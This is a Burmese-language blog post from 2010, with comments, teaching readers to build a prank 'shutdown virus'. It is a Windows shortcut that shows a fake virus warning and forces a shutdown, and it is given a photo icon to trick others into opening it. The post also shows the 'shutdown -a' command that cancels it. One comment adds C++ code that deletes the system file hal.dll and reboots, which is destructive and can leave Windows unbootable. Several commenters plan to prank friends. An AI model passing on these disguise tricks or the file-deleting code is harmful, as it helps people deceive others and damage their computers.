Shutdown Virus ရေးသားခြင်းနဲ့ ချေဖျတ်ခြင်း

notsyntheticsMarch 2, 20102min1628

ကျနော် ရေးရင်ကောင်းမလား မရေးရင်ကောင်းမလားနဲ့ စဉ်းစားနေတာ ကြာပါပြီ ။ မရတော့ဘူးဗျာ ရေးလိုက်ပြီ ။ ဗဟုသုတ ရအောင်မျှဝေတယ်လို့ ပဲ သဘောထားပေးပါ။
လေ နည်းနည်း ရှည်ပါဦးမယ် ။ :P တစ်ချို့ Virus မိမှာ အရမ်းကြောက်ပါတယ် ဒါပေမယ့် မေးကြည့် Virus ဆိုတာဘာလဲ ဆိုရင် ရေရေ ရာရာ မပြောနိုင်ပါဘူး။
Virus ဆိုတာ လွယ်လွယ်ပြောရရင် ( ခက်ခက်လဲ မပြောတတ်ပါ။ :P ) ပုံမှန် အလုပ်လုပ်နေတဲ့ ကွန်ပြူတာကို ဖိုင်တစ်ခုခု ကြောင့် အနှောင့် အယှက် ဖြစ်စေမယ်ဆိုရင်
အဲဒီဖိုင်ဟာ Virus လို့ ခေါ်နိုင်ပါတယ်။ Window system များ ပျက်စီးပြီး ၊ data များဆုံးရှူံးသည် အထိဖြစ်နိုင်ပါတယ်။ ( ကျနော်လေ့လာမိသလောက်က Virus ကြောင့်
Hardware ပျတ်စီးမှု မရှိတာ နှစ် ၂ဝ ကျော်ခဲ့ပါပြီ ။ )

အလွယ်ဆုံးနဲ့ အန ္တရာယ် အကင်းဆုံးက စရေးကြရအောင် ….. shutdown virus ကို တွေ့ဖူးနေကြပါ ( ကျနော်လည်း ယောင်တောင်တောင်နဲ့ မိဘူးပါတယ် )
အရင်ဆုံး Desktop ပေါ်မှာ R-click လုပ်ပြီး New – Shortcut ကို click ပါတယ် ။ New shortcut ဆိုတဲ့ icon နဲ့ အတူ Creat shortcut ဆိုတဲ့ box ပေါ်လာပါတယ်။
Text box နေရာလေးမှာ ဒါလေးကို ရိုက်ထည့်ပေးပါ ။ (space ခြားတာ မှန်ဖို့ လိုပါတယ်။)

shutdown -s -t 60 -c “WARNING a virus has been detected on your computer, emergency shutdown initiated”

(60 ဆိုတာက မိမိ ဘယ်လောက် အချိန် အတွင်းမှာ shutdown ကျသွားစေချင်လဲ ဆိုတဲ့ စက္ကန့် ဖြစ်ပါတယ်။ ” ” ကြားထဲက စာသားကတော့ ကြိုက်တာရေးနိုင်ပါတယ်။ )

Image Hosting by Picoodle.com

Next နှိပ်လိုက်ရင် Select a Tittle for the program ဆိုတဲ့ box ပေါ်ပါတယ်။ နာမည်ကို လည်းကြိုက်တာပေးပါ။ ပြီးရင် finish ပေါ့။

Image Hosting by Picoodle.com

မိမိပေးလိုက်တဲ့ နာမည်နဲ့ ပေါ်လာတဲ့ shortcut လေးကို R-Click လုပ်ပြီး properties နှိပ်ပါတယ်။ Change icon ဆိုတာလေး click ပြီး icon ပြောင်းပေးပါ။

Image Hosting by Picoodle.com

တစ်ခါမှ မမြင်ဘူးတဲ့ icon ဆိုရင်တော့ ဘယ်သူ ဖွင့် ကြည့် ပါ့မလဲ နော်.. ။ ကျနော်ကတော့ JPEG icon လေးပဲ ရွေးလိုက်ပါတယ်။ Desktopn ပေါ်မှာ photo လေးတစ်ခု
အတိုင်းဖြစ်နေပါတယ်။

Image Hosting by Picoodle.com

Image Hosting by Picoodle.com

Run ကြည့် ရအောင်ဗျာ …. ။
D-click ပေးလိုက်တာနဲ့ အောက်မှာ ပြထားတဲ့ အတိုင်းပေါ်လာပါတယ် ။ မသိရင်တော့ တော်တော် လန့်သွားမှာဗျ ။ ဘယ်နေရာမှ လည်း နှိပ် လို့ မရဘူး၊ ဘာနဲ့ မှလည်း
ပိတ်လို့မရပါဘူး ။ ဒါဆို ဒီအတိုင်း shutdown ကျသွားတာကို ထိုင်ကြည့်နေမှာလား …..။ ဟဲဟဲ

Image Hosting by Picoodle.com

run လေးကို ခေါ်ပြီး shutdown -a လို့ သတ်မှတ်ချိန် မပြည့် ခင်လေးမှာ ရိုက်ထည့်ပြီး enter ခေါက်လိုက်ပါ။ shutdown virus ပြန်ပိတ်သွား ပါလိမ့်မယ်။

Image Hosting by Picoodle.com

စမ်းကြည့်နိုင်ပါတယ် အန ္တရာယ်ကင်းပါတယ်။ :z

source:အစ်ကိုသံလုံငယ်ရဲ့ဆိုဒ်မှ ကူးယူတင်ပြခြင်းဖြစ်ပါတယ်

8 comments

  • trust

    May 8, 2010 at 6:14 am

    #include
    #include

    using namespace std;

    int main(int argc, char *argv[])
    {
    std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
    system(“shutdown -s -r”);
    system(“PAUSE”);
    return EXIT_SUCCESS;
    }

    အပျင်းပြေပေါ့နော်

  • moethiha

    May 22, 2010 at 10:15 am

    ကျေးဇူးပါပဲ
    ပညာတစ်ခုတိုးတာပေါ့ဗျာ

  • nyiminsatt

    June 3, 2010 at 7:13 pm

    Not bad. I got one information. Before I think virus can harm the hdd. Now, I realized. Thanks 🙂

  • gar

    July 4, 2010 at 9:40 am

    အ ကို deep freeze တင် ထား ရင် ဘယ် လို လုပ် မ လဲ။

  • Htoo

    July 17, 2010 at 4:30 am

    ကျွန်တော်လဲ အဲဒီဟာနဲ့ သူများတွေကိုနောက်ရဦးမယ်။
    အဲဒီလို စိတ်ဝင်စားစရာလေးတွေကို ပြောပြတဲ့အတွက် ကျေးဇူးတင်ပါတယ်။

  • cherrylandlay

    August 8, 2010 at 5:44 am

    D လိုကြုံလာတဲ့အခါ ဖြေရှင်းဖို့အတွက် နည်းလမ်းတစ်ခုတိုးတာပေါ့ဗျာ ကောင်းပါတယ် အကြိုးရှိအောင်သုံးတက်
    ရင်ပေါ့… သူများ အနှောက်ယှက်ဖြစ်စေမဲ့ဟာတော့ မလုပ်သင့်ပါဘူး ..ဘာပဲဖြစ်ဖြစ် တားဆီးမရတဲ့ နည်းပညာမ
    လား .. အဲဒီတော့ လုပ်နည်းလည်း သိ ရှောင်နည်းလည်းသိရတော့ ကျေးှဇူး တင်မိပါတယ် ..နောက်ထပ် ရေးပါဦး

    cherrylandlay (နိုင်နိုင်ထွန်း)

  • မန်း ရိပ်

    August 23, 2010 at 1:48 pm

    ဟုတ်ကဲ့ ဘာမှမဖြစ်ဘူးဆိုရင် စမ်းကြည့်တာပေါ့
    လာစမ်း virus

  • winkhant

    December 14, 2010 at 2:55 pm

    ဟွန်း ဟွန်း သေပီသာမှတ် င့ါသူငယ်ချင်းတွေတော့ ဟီး ဟီး

Leave a Reply